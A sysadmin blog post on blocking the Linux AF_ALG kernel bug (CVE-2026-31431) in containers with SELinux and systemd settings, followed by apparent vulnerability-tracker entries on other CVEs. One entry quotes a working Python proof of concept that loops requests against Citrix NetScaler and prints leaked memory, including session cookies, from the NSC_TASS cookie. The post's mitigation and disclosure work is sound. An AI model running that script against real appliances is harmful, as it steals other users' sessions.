Deny alg_socket to Containers with SELinux to Mitigate CVE‑2026‑31431 | Blog•Feistel•Party

CVE-2026-31431 or “Copy Fail” is a bug in the Linux kernel’s implementation of the AF_ALG socket type that exposes the kernel’s crypto subsystem to unprivileged userspace. Because most applications don’t use this and there is a risk of container escape, it makes sense to deny access.

In the example below, I’m using the fish shell with an SELinux userspace release after 3.6 which is when support for deny rules was added.

opc@sparkling ~\> # remove rule for testing
opc@sparkling ~\> sudo semodule -r psub-container-alg
libsemanage.semanage_direct_remove_key: Removing last psub-container-alg module (no other psub-container-alg module exists at another priority).
opc@sparkling ~\> sudo podman run -ti --rm alpine/openssl engine -t -c -vv afalg
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
[ available ]
opc@sparkling ~\> sudo semodule -i (sesearch -A -s container_ -rs -c alg_socket -p create | egrep -v unconfined | sed 's/^allow/\(deny/; s/:/ \(/; s/{/\(/; s/};/)))/' | psub -s -container-alg.cil)
opc@sparkling ~\> sudo podman run -ti --rm alpine/openssl engine -t -c -vv afalg
20DD97B0FFFF0000:error:4000006D:lib(128)::reason(109):engines/e_afalg.c:882:
20DD97B0FFFF0000:error:1300006D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:498:
20DD97B0FFFF0000:error:13000074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:470:id=afalg
opc@sparkling ~ [1]\> # :)
opc@sparkling ~ [1]\>

Alternative Mitigations

Red Hat suggests an initcall_blacklist in the boot arguments.

Lennart Poettering’s advice for CVE-2016-8655 should also work for CVE‑2026‑31431 by using RestrictAddressFamilies=~AF_ALG on a per-service basis. In my testing this works for both containers and other services. R-fx Networks pairs this with SystemCallArchitectures=native.

user@serv ~\> sudo systemd-run --pty --wait --collect podman run -ti --rm alpine/openssl engine -t -c -vvv afalg
Running as unit: run-u3914.service
Press ^] three times within 1s to disconnect TTY.
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
[ available ]
Finished with result: success
Main processes terminated with: code=exited/status=0
Service runtime: 548ms
user@serv ~\> sudo systemd-run --pty --wait --collect -p 'RestrictAddressFamilies=~AF_PACKET AF_ALG' podman run -ti --rm alpine/openssl engine -t -c -vvv afalg
Running as unit: run-u3923.service
Press ^] three times within 1s to disconnect TTY.
280B94F7067F0000:error:4000006D:lib(128)::reason(109):engines/e_afalg.c:882:
280B94F7067F0000:error:1300006D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:498:
280B94F7067F0000:error:13000074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:470:id=afalg
Finished with result: exit-code
Main processes terminated with: code=exited/status=1
Service runtime: 563ms
user@serv ~ [1]\> sudo systemd-run --pty --wait --collect openssl engine -t -c -vvv afalg
Running as unit: run-u3932.service
Press ^] three times within 1s to disconnect TTY.
(afalg) AFALG engine support
[AES-128-CBC, AES-192-CBC, AES-256-CBC]
[ available ]
Finished with result: success
Main processes terminated with: code=exited/status=0
Service runtime: 8ms
user@serv ~\> sudo systemd-run --pty --wait --collect -p 'RestrictAddressFamilies=~AF_PACKET AF_ALG' openssl engine -t -c -vvv afalg
Running as unit: run-u3935.service
Press ^] three times within 1s to disconnect TTY.
139718332651328:error:8006406D:lib(128):func(100):reason(109):engines/e_afalg.c:800:
139718332651328:error:260B606D:engine routines:dynamic_load:init failed:crypto/engine/eng_dyn.c:485:
139718332651328:error:2606A074:engine routines:ENGINE_by_id:no such engine:crypto/engine/eng_list.c:334:id=afalg
Finished with result: exit-code
Main processes terminated with: code=exited/status=1
Service runtime: 7ms
user@serv ~ [1]\>

Questions about SELinux

Why was support for deny rules only added to the SELinux userspace in 2023?

Why is the output of `sesearch` so dissimilar to the input of `semanage` ?

What is the purpose of `allow unconfined_domain_type domain:alg_socket` and does leaving this rule alone ruin the mitigation?

opc@sparkling ~\> seinfo -a unconfined_domain_type -x | grep -E '(contain|^\w|^\s{3})\w'
Type Attributes: 1
attribute unconfined_domain_type;
container_runtime_t
opc@sparkling ~\>

This relates to container_runtime_t. This is for privileged containers in rootless mode and for the container management engine itself. So it’s probably OK.

Microsoft WSL is also vulnerable

2026-04-30T15:40:35 by Alexandre Dulaunoy

JSON CVE-2026-31431

https://github.com/microsoft/WSL/issues/40365

Quick remediation

2026-04-30T10:07:37 by Alexandre Dulaunoy

JSON CVE-2026-31431

Kernel module (without reboot)

If your system use dynamic loading of kernel module, the following can be done:

rmmod algif_aead to ensure that the module is not loaded

Create and edit the file /etc/modprobe.d/disable-algif.conf and add install algif_aead /bin/false

Kernel with algif_aead (such as RedHat)

Based on the following https://csirt.egi.eu/2026/04/30/critical-vulnerability-in-linux-kernel/ reference, this can be done:

sudo grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"; sudo reboot"

which will require a reboot.

BPF filtering

There are also options there.

K000160486: Indicators of Compromise for c05d5254

2026-03-30T07:57:25 by Alexandre Dulaunoy

JSON CVE-2025-53521

This article provides the known indicators of compromise (IOCs) associated with malicious software c05d5254 and related activity, and actions to take if IOCs are discovered.

https://my.f5.com/manage/s/article/K000160486

Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2)

2026-03-30T06:20:52 by Alexandre Dulaunoy

JSON CVE-2026-3055

For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

which includes

import base64

import requests
import urllib3

urllib3.disable_warnings()

BANNER = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  &lt;_&gt; \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                            

watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py
(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-3055]
"""

print(BANNER)

while True:
    try:
        resp = requests.get("https://&lt;host&gt;/wsfed/passive?wctx", verify=False, allow_redirects=False)
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx+5:]
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass

Seems to be exploited and confirmed by Defused

2026-03-29T17:36:26 by Alexandre Dulaunoy

JSON CVE-2026-3055

🚨Citrix NetScaler CVE-2026-3055 is being actively exploited in the wild

Attackers send crafted SAMLRequest payloads to /saml/login omitting the AssertionConsumerServiceURL field, triggering the appliance to leak memory contents via the NSC_TASS cookie.

Our honeypot data shows exploitation activity from the same payload structure as the @watchtowrcyber PoC.

Track exploitation of our Citrix honeypots 👉 https://console.defusedcyber.com/capabilities

https://x.com/defusedcyber/status/2038266417091326156?s=46

UAC-0001 (APT28) carries out cyberattacks against Ukraine and EU countries using the exploit CVE-2026-21509

2026-02-02T12:56:35 by Paul Jung

JSON CVE-2026-21509

On 26 January 2026, Microsoft disclosed the actively exploited vulnerability CVE-2026-21509 in Microsoft Office, and within days weaponized DOC files appeared in public and via phishing campaigns targeting Ukrainian and EU government entities, using lures related to Ukraine and EU COREPER meetings; opening the documents triggers a WebDAV-based infection chain that downloads an LNK file, deploys a malicious DLL through COM hijacking and explorer.exe restart, executes shellcode hidden in an image, and ultimately launches the COVENANT command-and-control framework, which leverages the legitimate Filen cloud infrastructure, indicating a coordinated campaign likely to expand rapidly due to delayed patching and limited adoption of mitigations.

https://cert.gov.ua/article/6287250